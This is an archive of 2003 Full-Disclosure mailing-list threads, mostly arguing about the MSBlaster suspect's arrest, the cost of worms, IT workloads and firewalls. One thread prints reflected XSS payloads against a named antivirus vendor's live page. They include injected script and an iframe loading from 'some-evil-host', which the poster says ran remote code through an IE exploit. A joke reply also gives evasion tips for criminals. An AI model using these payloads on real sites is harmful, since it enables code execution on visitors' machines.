He'll more likely go to prison for 10-20. That's if he's lucky. I'm certain he will be made an example of. Poor dumb bastard. He wanted attention, now he's got it. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Richard M. Smith Sent: Friday, August 29, 2003 6:36 PM To: 'Jerry Heidtke'; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect The FBI followed the same steps that you outlined to locate Jeffrey Parson according to his indictment papers. The FBI also got an IP address for Jeffrey which traced back to his house from the hosting service for t33kid.com. Moral of the story: If you want to be a successful cybercriminal, remember to always hide behind proxy servers and don't use your real name and address when registering a domain name. If found guilty, I think an appropriate sentence is to make him clean up virus infected computers in public schools for a year. Richard -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jerry Heidtke Sent: Friday, August 29, 2003 4:47 PM To: the lumpalaya Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a script-kiddie that goes by teekid, he's got a web site called t33kid.com, the whois for the domain gives his real name and address. Enough probable cause to get a warrant right there. Jerry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
--On Friday, August 29, 2003 1:14 PM -1000 Jason Coombs [EMAIL PROTECTED] wrote: Before we can make progress in a discussion of blame we have to get the analogy right. So, are you responsible for all five copies of this message? :-) Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
Paul Schmehl [EMAIL PROTECTED] [2003:08:29:17:12:06-0500] scribed: snip / Yet, if the worm writer hadn't released the worm, the problem wouldn't even exist, would it? And, if guns had not been invented, nobody could be shot to death. So, what is it that you are trying to say? Who can put the jinni back into the bottle? -- Best Regards, mds - Dare to fix things before they break . . . - Our capacity for understanding is inversely proportional to how much we think we know. The more I know, the more I know I don't know . . . -- pgp0.pgp Description: PGP signature
RE: [Full-Disclosure] JAP back doored
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Goncalo Costa Sent: Thursday, August 28, 2003 2:47 AM To: Drew Copley Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] JAP back doored snip Your arguments have nothing to do with the argument at hand which is quite simple: Governments should have no right to force developers to trojanize their applications and keep silent about it. Apparently, this entire email is from someone that wants to argue over the definition of the word government here. They take offense at me saying the German Government did this, though they have no problem saying, The US government did that. Regardless, I stand by my statement, above, which is exceedingly simple. (And, this statement does not even mention German, nor US.) snip I think you should stop for a minute and try to learn the difference between Germany (country), the German state, the German government and the German judicial system. Germany did nothing. Case in point. If you want to talk about the German government you could talk about http://www.gnupg.org/aegypten Cool. Just like what the US does. Lotsa of programs like that. Case in point. snip... A lot of other cases in point Costa, I do not condemn people that use the word government vaguely. There is no reason to. You do condemn people that do this. Yet, you do this yourself. Why be a hypocrite over a rule which is so meaningless that you had to make it up? That is a rhetorical question. I do not need your answer. Your replies were ludicrous and hypocritical. Even if I bothered defending myself, I would be defending mostly things I did not say. If you want to foam at the mouth on these issues I would suggest alt.hate.USA or something, rather than here. And, yeah, under an assumed name, I have released an anonymizing agent, and that was why I posted on this issue. I did not do it because of anti-German prejudice. In fact, my same group has also released an application by a German developer. My concern, though it may have sounded nationalistic, was not. But, I have already said this, and will not again. Any further emails will be plonked. Maybe you can post on something regarding security. -BEGIN PGP SIGNATURE- Version: PGP 8.0 iQA/AwUBP0+f9gkWkugjEnC3EQIxyQCgxnLzsrZOenPwNxB3BlFiwQcsQ9kAn2Eb 2XJxttrY+78rtlDboge0HvzI =MLV0 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect (longreply)
--On Friday, August 29, 2003 15:49:43 -0700 Chris DeVoney [EMAIL PROTECTED] cast his pearls before swine and wrote: In short, yeah, what you suggest is true but now let's talk about a part of the real world that is examined infrequently. Well stated, but an absolute waste of time on this list. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
On Fri, 29 Aug 2003 15:47:22 CDT, Jerry Heidtke said: It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a No, given that it only hit 7,000 systems, it probably took 5 days before they got a copy of the binary and somebody who was computer forensics trained and not allocated to the main Blaster or Nachi work, and get them to the same place at the same time And then a very long afternoon documenting the steps they took using Google. Remember that it's OK for *us* to say yeah, that's probably him. The FBI does it, they have to make *really* sure they aren't googling for the wrong 'teekid' - first they have to convince a judge they have the right guy, and if they still screw up and bash down the door of a 97-year-old woman who dies of a heart attack of fright (yes, that DID happen recently), they end up with serious egg on their faces. pgp0.pgp Description: PGP signature
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
Chris DeVoney [EMAIL PROTECTED] wrote: On Friday, August 29, 2003 8:24 AM, Charles Ballowe wrote: Interesting -- the net cost of the worm is actually a net $0.00. For every penny that a company chalks up as a cost to the worm, some other company must be chalking up the cost as a profit from the worm. Forgive the comment, but that statement is very untrue. As someone else hinted, companies are diverting manpower from other projects to tackle the worm. No other company is benefitting from that expenditure. Wrong. In at least some of those cases those extra resources are simply hastily applying the fixes and better preventative measures that should already have been applied or in place. Thus the _rest of the Internet_ benefits from that expenditure and therefore the site being fixed not only directly benefits (it will no longer be vulnerable to attack through this and related and highly obvious, even if not previously used in exploits against it, mechanisms) but indirectly (through its efforts and those on other previously inadequately configured systems, the Internet as a whole is a better place, meaning it is a better place for this site too). Then there is the case of academic and medical establishments, of which I can speak from experience. There were some additional costs in hiring contractors. But the biggest cost was the diversion of (my estimate) hundreds of man-weeks to analyzing, patching, remediating, mitigating these worms from other projects. That wasn't money lost, that was time lost. And the faculty, staff, students, and everyone who depends on that work loss. ...which clearly was never suitably factored into the initial design, roll-out and ongoing management of the systems in those establishments. If they paid out big now to fix this one-off (yeah, right...) incident, why did they not pay the little more up front to ensure they had well-designed, properly secured and easily managed systems that would have _prevented_ all those losses you are now bleating about? Why not? Simple -- they decided it was better to save a few grand and get four more PCs (or a couple of kick-arse systems to slake the sys- admins thirsts for Quake, or whatever...). False economy. Always was, always is and always will be. Do it once, do it right. There was no rocket science in being prepared to be anything other than mildly inconvenienced by Blaster -- sure, outside machines or machines with outside network connections that are also inside your site can be a hassle, but quality network gear allowing you to turn those machines off outlet by outlet is available and has been forever (though again, yes it costs a few bucks more up-front). Further, as such paths have always been stupefyingly obvious entrance points for this kind of attack, protecting against them should always have been factored into the design and thus not be something to be hand-wringing over after the latest attack. I won't go into fuller details, but because of the heavy dependence of computing in biotechnology and medical fields, these worms and other security problems have a larger societial cost. Which _surely_ raises questions about the sanity of anyone who would consider connecting such critical stuff to a sewer of a network like the Internet as we have it, and doubly so to actually make such connections without taking _extremely careful and well thought through protective measures. It also raises serious questions about the sanity of the funding processes and groups that dole out the money driving these projects. ... Most university medical research comes from fixed grants. When you are always trying make those limited resources stretch, diverting money and time to nonsense like this is very, very frustrating. These problems do delay medical research and adds to the cost of medical research without giving human benefits. Which makes it all the more imperative that the tax dollars funding you are deployed to best effect _up front_ rather than inefficiently and all topsy turvy when half the campus is running around like chooks with their heads cut off, no?? I wish these misceates would consider those implications before converting a lab server into a warez server when they get hit with a leading-edge or rare illness. Yeah, right, don't we all In the meantime however, the US tax payers expect you (I don't mean you personally, more you, the IT staff at such institutions collectively) to do something more effective with the contributions they make... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
--On Friday, August 29, 2003 7:13 PM -0400 [EMAIL PROTECTED] wrote: You're totally missing the point. And this surprises you? If I'm doing security 30 hours a week, that's 30 hours a week I'm not available for other things. [skip the long litany of *other* things you could be doing] In case anybody thinks that Valdis is somehow bragging, forget it. The many roles he is expected to fulfill are typical in a university environment. There *is* no such thing as an intrusion detection specialist. Everyone in edu wears many hats - most of which are fulltime jobs in their own right. And you can't weasel out by saying Hire somebody else to do that other stuff or hire somebody else to do security - the point is that if we did hire somebody else, then we'd only have 1 person of the 2 available for productive work. If we didn't have to keep spending resources on security, BOTH people would be available then. That's won't stop anyone from trying though. They actually think security is the stuff you *should* be doing, not helping your users be more productive. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Selfmade worms in the wild ;)
more fun: why didn't you try: http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756VName=WORM_MSBLAST.%3Cscript%20type='text/javascript'%3Ealert('boo!')%3C/script%3E i think one can pass almost any xss there (citing http://www.trendmicro.com/en/about/profile/overview.htm : Trend Micro Incorporated is a global leader in antivirus and Internet content security software and services) do they test their internet content security software on their own pages? greetz knitti Attention, that's joke-trash: http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55745VName=WORM_MSBLAST.G http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756VName=WORM_MSBLAST.Z You can change id's and names... -mo- -- == G.P Online-Redaktion === Kryptocrew .: your security advisor team :. mailto:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
Well, sounds like to me, they have lost focus and are looking for a quick scape goat to me. Again, probably driven by media pressures and others to show half-ass results based on half-ass analysis. -b On Fri, 2003-08-29 at 17:33, Brent Colflesh wrote: I'm sure that the FBI would never exaggerate the extent of the damage, in order to look like they were busting a major hacker after a difficult investigation instead of some kid like millions of others with more time and anger than skills. Don't belittle the heroic efforts of the FBI - if you do, then the terrorists win! ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Selfmade worms in the wild ;)
more fun: why didn't you try: http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756VName=WORM_MSBLAST.%3Cscript%20type='text/javascript'%3Ealert('boo!')%3C/script%3E i think one can pass almost any xss there (citing http://www.trendmicro.com/en/about/profile/overview.htm : Trend Micro Incorporated is a global leader in antivirus and Internet content security software and services) do they test their internet content security software on their own pages? greetz knitti Attention, that's joke-trash: http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55745VName=WORM_MSBLAST.G http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756VName=WORM_MSBLAST.Z You can change id's and names... -mo- -- == G.P Online-Redaktion === Kryptocrew .: your security advisor team :. mailto:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
On Fri, 2003-08-29 at 18:35, Richard M. Smith wrote: The FBI followed the same steps that you outlined to locate Jeffrey Parson according to his indictment papers. The FBI also got an IP address for Jeffrey which traced back to his house from the hosting service for t33kid.com. Moral of the story: If you want to be a successful cybercriminal, remember to always hide behind proxy servers and don't use your real name and address when registering a domain name. If found guilty, I think an appropriate sentence is to make him clean up virus infected computers in public schools for a year. Haha, jeez man? and your volunteering to supervise him right? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] The Jeffrey Parson criminal complaint is online
http://news.findlaw.com/nytimes/docs/cyberlaw/usparson82803cmp.pdf ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
On Fri, 2003-08-29 at 19:13, [EMAIL PROTECTED] wrote: On Fri, 29 Aug 2003 14:46:32 PDT, morning_wood said: And has it occurred to you that *MAYBE* his high paying job would be more productive if he wasn't spending most of his time having to deal with people breaking in, either proactively or reactively?? that is his job You're totally missing the point. If I'm doing security 30 hours a week, that's 30 hours a week I'm not available for other things. ??? uh, the extended coffee breaks? That's 30 hours I'm not spending helping do network performance tuning for the mail server. I'm sure the 70,000 users of the mail server would prefer that I was able to do that instead. You mean... Member of the Exchange server mop broom crew? That's 30 hours I'm not spending designing a new, more featureful print management system. I'm sure the people who get print jobs that we need to keep running (accounts receivable, invoices, purchase orders, etc) would prefer I was able to do that instead. Your printer says it needs white toner. That's 30 hours I'm not spending diagnosing compiler and kernel bugs. I'm sure the researcher who has a $2M grant project dead in the water would prefer I was able to do that instead. That's 30 hours I'm not spending working on a way to migrate users from Windows to Linux. I'm sure the people who are looking at a $500K/year bill for Microsoft licenses (and want a way to save money) would prefer I was able to do that instead. That's 30 hours I'm not spending deploying a new release of Listserv that has features that my users are asking for. I'm sure that many of the users on our 6,023 lists would prefer I was able to do that instead. You starting to see a pattern here? Jack of all trades? And yes, those are *ALL* things that are *part of* my job. Many of them are things I'd enjoy doing more. All of them are things that would provide more *direct* benefit to my site than doing security. And you can't weasel out by saying Hire somebody else to do that other stuff or hire somebody else to do security - the point is that if we did hire somebody else, then we'd only have 1 person of the 2 available for productive work. If we didn't have to keep spending resources on security, BOTH people would be available then. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Lets discuss, Firewalls...
Home and business firewalls Question to ponder: OK, on my home LAN I have set up a windows NT4.0 SP2 box with IIS and SQL Server 7.0. No hot fixes on the box at all. I run a NESSUS scan and I get over 500 available exploits for this box. My outside address is 216.144.100.100 (not really so please do not attack who ever that is) The box on the inside is 192.168.0.100/24 Admin password is blank. All IPC$ shares are there. I can surf the web from the box so it is fine. I have no firewall, just a NAT on the Motorola Surfboard and no 1 to 1 NATing. If you serve NO applications from the inside of your network (no publicly accessible web server, email server, ftp server etc...), and you have a NAT router so your addressing on the inside or your home or business is private (i.e. 192.168.0.x, 10.10.10.x, 172.16.1.x) Can you get to it? How? Do you still need a firewall? Why? Mike
Re: [Full-Disclosure] GOOD: A legal fix for software flaws?
Gregory Steuck wrote: Jeremiah == Jeremiah Cornelius [EMAIL PROTECTED] writes: Jeremiah Administration for Windows networks is similar to Jeremiah maintaining a 12-year old GM Truck. Brand new, W2K+3 Jeremiah already has 190K miles of wear. Where did you get his gem? It is hilarious, it brightened up my day. I am the regretful owner of a '91 Blazer S10 Tahoe. The parallel in these experiences is altogether too apparent to me. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: (SPAM?) [Full-Disclosure] Lets discuss, Firewalls...
Nice try binky. Content analysis details: (5.60 hits, 5 required) HOME_EMPLOYMENT(1.6 points) BODY: Information on how to work at home (2) HTML_FONT_FACE_ODD (0.1 points) BODY: HTML font face is not a commonly used face HTML_60_70 (0.5 points) BODY: Message is 60% to 70% HTML HTML_MESSAGE (0.1 points) BODY: HTML included in message KNOWN_MAILING_LIST (-0.5 points) Email came from some known mailing list software FORGED_MUA_OUTLOOK (3.7 points) Forged mail pretending to be from MS Outlook MISSING_OUTLOOK_NAME (0.1 points) Message looks like Outlook, but isn't -jim Mike @ Suzzal.net wrote: Home and business firewalls Question to ponder: blah, blah, blah... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
My life sucks - was Re: [Full-Disclosure] Authorities eye MSBlastersuspect
I must say, you folk are over worked and I think that you harbor a slight grudge because of it. In case anybody thinks that XX is somehow bragging, forget it. The many roles he is expected to fulfill are typical in a university environment. There *is* no such thing as an intrusion detection specialist. Everyone in edu wears many hats - most of which are fulltime jobs in their own right. An example was given where projects were on hold for whatever reason. I believe those projects were impacted severely by a lack of productivity while the network was down too. To take it a little bit further, a lot of other projects that generate the revenue that contribute to the grants that fund the projects were impacted because of the insecurity of systems as a whole. I think we can all agree that the EDU is as damaging as the high speed home user in this respect. The issue I take is that the EDU has an opportunity to mitigate these issues in part through policy and education. The home user is a much more difficult challenge. And you can't weasel out by saying Hire somebody else to do that other stuff or hire somebody else to do security - the point is that if we did hire somebody else, then we'd only have 1 person of the 2 available for productive work. If we didn't have to keep spending resources on security, BOTH people would be available then. Kudos to all administrators for taking on the task of managing and running a challenging environment. I fear that the probems you face are not easily resolved at your level and that there is a lot more work to be done to raise the awareness at all levels. You have chosen to take on this challenge by your decision to continue to work there, please quit telling us how difficult it is and why you cannot do it and spend that time doing it and explaining how you did it. I understand that it will take longer and I understand that it is frustrating and I understand that it is... Truth is you choose to continue to work there and be security aware so please contribute to the solution and not defend your problems. That's won't stop anyone from trying though. They actually think security is the stuff you *should* be doing, not helping your users be more productive. Like it or not security is a part of the job and failure to execute is not just your problem, we all feel the impact. Don't like the work, change your life, go sell something at your local retail store and have fun every day when you are off instead of should be off. I believe that _proper_ security will help your users be more productive, not just the act of patching and patching but employing the methodologies behind proper security. What would have been the impact to productivity had this worn of the day deleted all .doc files and then filled the ramaining disk with random chars? People sit here on this list defending the problems and issues they face giving those that might be facing similar problems a reason to ignore it because XYZ is not solving it either. The reaity is that you can be by presenting how you solved problems given the limited budget and resources available and help those facing similar challenges instead of giving them reasons to ignore them and complaining all the time. Tis all I am going to sat about that. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
HIS life sucks Re: [Full-Disclosure] Authorities eye MSBlaster suspect
Teekid defacement of MNGFOA (Minnesota Government Finance Officers Association) http://www.google.ca/search?q=cache:LxFv6TNMbqIJ:www.mngfoa.org/start_page. htm Teekid trying to get some trojan cgi-notify to work ? http://www.webmasterworld.com/forum10/978.htm Teekid discussing irc-based trojan http://www.trojanforge.net/showthread/t-2162.html I really hope he end up in jail. That would scare a few millions kiddies, at least. :) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
In some mail from [EMAIL PROTECTED], sie said: [...] That's 30 hours I'm not spending helping do network performance tuning [...] You know, I read through that list and saw numerous things that you shouldn't have to do, besides clean up from worms and viruses. If you feel you are so short on time, maybe you need to talk to HR about hiring you an assistant who can take care of the drugery and leave you to concentrate on the really important stuff. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Selfmade worms in the wild ;)
well... lets see, we could make it an untrusted link by http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756; VName=WORM_MSBLAST.script%20language=JavaScript%20src=http://www.astalavista .com/backend/news.js%20type=text/javascript/script and include some remote javascript of our choice, or the latest IE ADODB explot. the obvious choice for that would be the classic.. http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756; VName=WORM_MSBLAST.iframe src=http://some-evil-host/script/orhtml/etc/bla/;/iframe for everones info, the above was tested with the ADODB exploit to execute remote code... sucessfully i might add. ( unpatched IE ) this goes to show that XSS is still very much a security concern, especially coupled together with the lastest browser exploit to become a very dangerous vector of attack, especially by way of a previously trusted URL. this is not looking real good for trend. good job Mo 8-) morning_wood http://exploitlabs.com http://e2-labs.com - Original Message - From: Redaktion-Kryptocrew [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, August 29, 2003 12:02 AM Subject: [Full-Disclosure] Selfmade worms in the wild ;) You can change id's and names... -mo- Kryptocrew .: your security advisor team :. mailto:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
I can say this is the same for some companies in corporate america, I currently have to split my time working on security issues for the systems I control (100 solaris, 200 linux) and self improvment projects like implementing AFS. If there are currently no hair on fire events while the rest of the team is out. On Fri, 29 Aug 2003, Paul Schmehl wrote: In case anybody thinks that Valdis is somehow bragging, forget it. The many roles he is expected to fulfill are typical in a university environment. There *is* no such thing as an intrusion detection specialist. Everyone in edu wears many hats - most of which are fulltime jobs in their own right. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Lets discuss, Firewalls...
Admin password is blank. All IPC$ shares are there. I can surf the web from the box so it is fine. security industry has a saying: crunchy on the outside, chewey on the inside. EASY to get inside your computer with your help. Once done, you are 0wn8d. you can hit a malishious web site and automaticly start running active x controls. you can receive a 'day0' virus that runs on your computer. you can get a call from the FBI (like 19 others did last week, and 318 did on September 13th, 2001) saying that they suspect that either you are a hacker or terrorist, or your computer has been taken over by a hacker or terrorist you can have all your data wiped out, owned, cookies taken (where pin numbers, passwords and bank accounts might be) you can have spyware loaded that will keep track of all of your keystrokes, including pin numbers, passwords and bank accounts. you can get your isp to cut you off due to activity that you didn't even see happening. If you serve NO applications from the inside of your network (no publicly accessible web server, email server, ftp server etc...), and you have a NAT router so your addressing on the inside or your home or business is private (i.e. 192.168.0.x, 10.10.10.x, 172.16.1.x) those 20 systems that were to SERVE UP the sobig.F upgrade were running on programs, no servers (except that which the hacker put on) Do you still need a firewall? Why? you need more than a firewall. says top 7 mistakes users make, #4 (i think) is: Relying primarly on a firewall. You need to practice 'save hex' in all that that means. -- Michael Scheidell, CEO SECNAP Network Security, LLC Sales: 866-SECNAPNET / (1-866-732-6276) Main: 561-368-9561 / www.secnap.net Looking for a career in Internet security? http://www.secnap.net/employment/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] ... ... ...
opa, pessoal eu acho que jah sei pq o chat nao ta interpretando comandos do php e soh do html... eh pq o codigo do meu amigo eh tao precario que quando vc digita uma frase... essa frase eh salva num txt: http://www-lugal.no-ip.org/vargthon/testes/chat.txt e depois esse arquivo eh mostrado pra voce e atualizado sucessivamente... eu acho que esse eh oh motivo... [ ]'s _ Voce quer um iGMail protegido contra vírus e spams? Clique aqui: http://www.igmailseguro.ig.com.br Ofertas imperdíveis! Link: http://www.americanas.com.br/ig/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MS Blaster author / morning_wood misinformed
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi Donald, Interesting (child-like) thoughts, but in reality, this society we live in has laws. If a person leaves the door to their home unlocked one evening (consciously or mistakenly) and someone chooses to go inside and ransacks the place. Sure the homeowner probably should have locked the door, but doing so didn't give the attacker just cause to go inside and cause the person grief. It's still a crime. And if caught, the result will still be the same whether you're in the USA, Canada, Germany or China... Do not pass go. Do not collect $200. Go directly to jail (or at least pay some fines). Darren From: morning_wood [EMAIL PROTECTED] To: Charles Ballowe [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Authorities eye MSBlaster suspect Date: Fri, 29 Aug 2003 09:18:48 -0700 if the worm was active in anticipation of a patch that intoduced a new exploit vector and it took advantage of that, is'nt the vendor ( microsoft ) to blame then? As well there was plenty of advanced warning on this exploit long before msblast was an issue. It seems to me that it is each admins responsiblity, if they were affected ( infected ) not the coder. if this were the case the LastStage(of)Delerium would be the blamed party for developing and releasing the exploit, but alas.. they are not of USA orgin. SUE LITIGATE BLAME PROCECUTE as long as the general public remains uneducated ( and many Fortune500 admins) we will continue to see this type of action against coders for blame, not the people actualy responsible for allowing thier infrastructure to become targets in the first place. im sure this ignorance is a byproduct of the weak mind of most Americans as they are in a constant state to blame other for thier own problems, this can be seen everywhere in todays American society... commonly refered as to the poor me syndrome.. Q. why did you murder the victim? A. my father never told me he loved me ( real answer - you pulled the triger ) Q. why was my network compromised? A. because of someone else ( real answer - you suck at internet ) muh 2 bytes, morning_wood -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 wkYEARECAAYFAj9QqKIACgkQVkUxEVe6w3tiUACdE6EKxDx9XneySVWt9tXT3nzOp2MA nR8r2bPtQ9ZpsW4NbDsJs4MKM7w5 =YOHD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
[EMAIL PROTECTED] [2003:08:29:20:56:30-0400] scribed: On Fri, 29 Aug 2003 15:47:22 CDT, Jerry Heidtke said: It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a No, given that it only hit 7,000 systems, it probably took 5 days before they got a copy of the binary and somebody who was computer forensics trained and not allocated to the main Blaster or Nachi work, and get them to the same place at the same time And then a very long afternoon documenting the steps they took using Google. Remember that it's OK for *us* to say yeah, that's probably him. The FBI does it, they have to make *really* sure they aren't googling for the wrong 'teekid' - first they have to convince a judge they have the right guy, and if they still screw up and bash down the door of a 97-year-old woman who dies of a heart attack of fright (yes, that DID happen recently), they end up with serious egg on their faces. OK, they nabbed a nickel-bagger; let's not get carried away! This kid is small potatoes, compared to other vermin spreaders, and we -- on this list, at least -- know that as fact. It's one thing to make an example of this kid; it's quite another thing to put a lid on this whole wormy Internet thingy . . . -- Best Regards, mds - Dare to fix things before they break . . . - Our capacity for understanding is inversely proportional to how much we think we know. The more I know, the more I know I don't know . . . -- pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
[EMAIL PROTECTED] [2003:08:29:20:56:30-0400] scribed: On Fri, 29 Aug 2003 15:47:22 CDT, Jerry Heidtke said: It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a No, given that it only hit 7,000 systems, it probably took 5 days before they got a copy of the binary and somebody who was computer forensics trained and not allocated to the main Blaster or Nachi work, and get them to the same place at the same time And then a very long afternoon documenting the steps they took using Google. Remember that it's OK for *us* to say yeah, that's probably him. The FBI does it, they have to make *really* sure they aren't googling for the wrong 'teekid' - first they have to convince a judge they have the right guy, and if they still screw up and bash down the door of a 97-year-old woman who dies of a heart attack of fright (yes, that DID happen recently), they end up with serious egg on their faces. OK, they nabbed a nickel-bagger; let's not get carried away! This kid is small potatoes, compared to other vermin spreaders, and we -- on this list, at least -- know that as fact. It's one thing to make an example of this kid; it's quite another thing to put a lid on this whole wormy Internet thingy . . . -- Best Regards, mds - Dare to fix things before they break . . . - Our capacity for understanding is inversely proportional to how much we think we know. The more I know, the more I know I don't know . . . -- pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
--On Saturday, August 30, 2003 9:24 AM -0500 Michael D Schleif [EMAIL PROTECTED] wrote: OK, they nabbed a nickel-bagger; let's not get carried away! This kid is small potatoes, compared to other vermin spreaders, and we -- on this list, at least -- know that as fact. It's one thing to make an example of this kid; it's quite another thing to put a lid on this whole wormy Internet thingy . . . Trust me, work is being done to catch other ones as well. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Lets discuss, Firewalls...
On August 29, 9:33 pm Mike @ Suzzal.net [EMAIL PROTECTED] wrote: Can you get to it? How? Possibly. Source routed packets. Do you still need a firewall? Why? Yes. To block source routed packets. There may be a registry setting to not accept source routed packets on windows...I'm not sure. On linux you'd: echo 0 /proc/sys/net/ipv4/conf/interface/accept_source_route Do that once for each interface on your box. Another reason to have a firewall is to limit outbound traffic. Say you click on an email file attachment ( i.e. a really 'wicked' screensaver ;) and your box gets infected with some worm. Do you really want your box to be able to advertise to the world that it's infectedand possibly infect other boxes? --Ben ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MS Blaster author / morning_wood misinformed
Hi! Interesting (child-like) thoughts, but in reality, this society we live in has laws. If a person leaves the door to their home unlocked one evening (consciously or mistakenly) and someone chooses to go inside and ransacks the place. Sure the homeowner probably should have locked the door, but doing so didn't give the attacker just cause to go inside and cause the person grief. It's still a crime. And if caught, the result will still be the same whether you're in the USA, Canada, Germany or China... Do not pass go. Do not collect $200. Go directly to jail (or at least pay some fines). I don't know about US, Canadian, German or Chinese law. But in Dutch law there is a big difference between entering a house and stealing stuff and breaking into a house and stealing exactly the same stuff. Apparently the house owner has a responsibility of his own. Groetjes, Peter Busser -- The Adamantix Project Taking trustworthy software out of the labs, and into the real world http://www.adamantix.org/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] unsuscribe list please
Linux user: 58887 Red Hat - CreativNet.info ** AVISO LEGAL ***Este mensaje es solamente para la persona a la que va dirigido. Puede contenerinformacin confidencial o legalmente protegida. No hay renuncia a la confidencialidad o privilegio por cualquier transmisin mala/errnea. Si ustedha recibido este mensaje por error, le rogamos que borre de su sistemainmediatamente el mensaje asi como todas sus copias, destruya todas las copiasdel mismo de su disco duro y notifique al remitente. ** AVISO LEGAL ***[EMAIL PROTECTED] creativnet.jpg
Re: [Full-Disclosure] MS Blaster author / morning_wood misinformed
